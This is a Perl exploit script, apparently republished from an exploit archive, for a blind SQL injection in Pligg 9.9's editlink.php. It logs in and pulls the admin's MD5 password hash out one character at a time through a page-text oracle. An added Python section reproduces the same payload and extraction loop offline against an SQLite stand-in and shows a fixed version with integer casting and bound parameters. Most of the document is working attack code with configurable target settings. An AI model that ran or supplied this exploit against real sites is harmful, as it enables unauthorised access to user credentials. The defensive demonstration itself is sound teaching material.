Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit
Source: www.Schap.Org  Author: Bansal  Published: 2009-04-21

#!/usr/bin/perl

######################################################################################
# Pligg v9.9 Blind SQL Injection
#####################################
#
# vuln:
#   editlink.php?id SQL Injection:
#   (magic_quotes off)
#
#   This exploit is possible because the $id variable in editlink.php is taken
#   from the URL and then used in an SQL query without being sanitized.
#
#   The oracle is the page text: when the injected subquery evaluates to the id
#   of a link the logged-in user owns, editlink.php shows the edit form;
#   otherwise it answers "not your link". That one-bit answer is used to read
#   the password hash of user_id 1 one hex character at a time.
#
#####################################
#
#  by Rohit Bansal [rohitisback@gmail.com] www.Schap.Org
#  original advisory: http://www.milw0rm.com/exploits/5406 (Guido Landi)
#
######################################################################################

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Cookies;

my @chars = split(//, "0123456789abcdef");         # MD5 hex alphabet
                                                    ####### CHANGE THESE ########
my $url      = "http://victim.com/path-to-pligg/";  # site and path to pligg (keep the trailing slash)
my $mylink   = 1;                                   # id of a link the user posted
my $username = "user";                              # username to log in with
my $password = "password";                          # password to log in with
my $hashlen  = 32;                                  # Pligg 9.9 stores MD5 hex digests; raise for longer hashes
my $table    = "pligg_users";                       # users table with the default "pligg_" prefix

my $hash = "";
my $content;

print "\nPligg CMS v9.9 editlink.php Blind SQL Injection\n\n";

print "+ Logging in to $url\n";

my $ua = LWP::UserAgent->new() or die "cannot create user agent";
$ua->agent('Mozilla');
my $cj = HTTP::Cookies->new;
$ua->cookie_jar($cj);                               # the session cookie set by login.php is reused below

my $req = HTTP::Request->new(POST => $url . "login.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("username=$username&password=$password&processlogin=1");
my $res = $ua->request($req);
die "login request failed: " . $res->status_line unless $res->is_success or $res->is_redirect;

print "+ Extracting hash...\n";
print "User god hash: ";

# MySQL SUBSTR() is 1-based, so positions run from 1 to $hashlen
for (my $i = 1; $i <= $hashlen; $i++)
{
    for (my $j = 0; $j < @chars; $j++)
    {
        # id=(select(if(<hash char $i> = '<guess>', <my link>, -999)))
        # correct guess -> our own link id -> edit form; wrong guess -> -999 -> "not your link"
        my $craft  = "editlink.php?id=(select(if((select%20substr(user_pass,$i,1)%20from%20$table%20where%20";
        $craft    .= "user_id=1)=\'" . $chars[$j] . "\'," . $mylink . ",-999)))";
        $req = HTTP::Request->new(GET => $url . $craft);
        $res = $ua->request($req);

        $content = $res->content;

        if (!($content =~ /not your link/i))
        {
            print $chars[$j];
            $hash .= $chars[$j];
            last;                                   # character found, skip the remaining guesses
        }
    }
}

print "\n";
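The header comment names the flaw but not the mechanics of the oracle. As an added example (not part of the original exploit and not Pligg's code), the following Python reproduces the technique offline against an in-memory SQLite stand-in: an `editlink_vulnerable` function that concatenates `id` into its query the way the advisory describes, the character-by-character extraction loop built from the same payload shape as the Perl `$craft`, and an `editlink_fixed` variant that casts and binds the parameter. The table contents, the `editlink_*` functions, the user and link ids, and the rendering of MySQL's IF() as CASE (so SQLite can evaluate it) are all assumptions made for the demonstration.

```python
import hashlib
import sqlite3

# Constructed fixture, not data from any real Pligg install: user_id 1 holds the
# hash we want, user_id 2 is the low-privilege account we log in as and owns link 1.
TARGET_HASH = hashlib.md5(b"constructed-admin-secret").hexdigest()
LOGGED_IN_USER = 2
MY_LINK = 1
HEX = "0123456789abcdef"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pligg_users (user_id INTEGER, user_login TEXT, user_pass TEXT)")
    db.execute("CREATE TABLE pligg_links (link_id INTEGER, link_author INTEGER)")
    db.execute("INSERT INTO pligg_users VALUES (1, 'god', ?)", (TARGET_HASH,))
    db.execute("INSERT INTO pligg_users VALUES (2, 'user', ?)",
               (hashlib.md5(b"password").hexdigest(),))
    db.execute("INSERT INTO pligg_links VALUES (?, ?)", (MY_LINK, LOGGED_IN_USER))
    return db


def editlink_vulnerable(db, user_id, id_param):
    """Stand-in for the flawed editlink.php: $id is concatenated into the query."""
    sql = "SELECT link_author FROM pligg_links WHERE link_id = " + id_param
    row = db.execute(sql).fetchone()
    if row is None or row[0] != user_id:
        return "Error: this is not your link"
    return "<form>edit link</form>"


def editlink_fixed(db, user_id, id_param):
    """Hardened stand-in: id must be an integer and is bound, never interpolated."""
    try:
        link_id = int(id_param)
    except ValueError:
        return "Error: this is not your link"
    row = db.execute("SELECT link_author FROM pligg_links WHERE link_id = ?",
                     (link_id,)).fetchone()
    if row is None or row[0] != user_id:
        return "Error: this is not your link"
    return "<form>edit link</form>"


def payload(pos, guess, my_link):
    """Same shape as the Perl $craft; MySQL IF(cond, a, b) is written as CASE
    here only so SQLite can evaluate it (assumption for the offline demo)."""
    return ("(select(case when (select substr(user_pass,%d,1) from pligg_users "
            "where user_id=1)='%s' then %d else -999 end))" % (pos, guess, my_link))


def extract_hash(oracle, my_link, length=32, alphabet=HEX):
    """Boolean-blind extraction: one request per (position, guess), first hit wins."""
    found = ""
    for pos in range(1, length + 1):          # SQL substr() is 1-based
        for ch in alphabet:
            if "not your link" not in oracle(payload(pos, ch, my_link)):
                found += ch
                break
        else:
            # nothing matched: injection blocked, wrong table prefix, or wrong alphabet
            raise RuntimeError("no match at position %d; got %r so far" % (pos, found))
    return found


def dump_from_vulnerable():
    db = make_db()
    return extract_hash(lambda p: editlink_vulnerable(db, LOGGED_IN_USER, p), MY_LINK)


def hardened_blocks_dump():
    db = make_db()
    try:
        extract_hash(lambda p: editlink_fixed(db, LOGGED_IN_USER, p), MY_LINK)
    except RuntimeError:
        return True
    return False


if __name__ == "__main__":
    print("recovered:", dump_from_vulnerable())
    print("target:   ", TARGET_HASH)
    print("hardened editlink blocks extraction:", hardened_blocks_dump())
```

Against the vulnerable stand-in the loop needs at most 16 requests per position (512 for a 32-character MD5 hex digest, about half that on average), exactly the request budget of the Perl script once it stops at the first matching character. Against the hardened variant no guess ever matches, because the payload fails the `int()` cast before it reaches the database, and the extractor reports the failure instead of silently returning a short or empty hash.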


 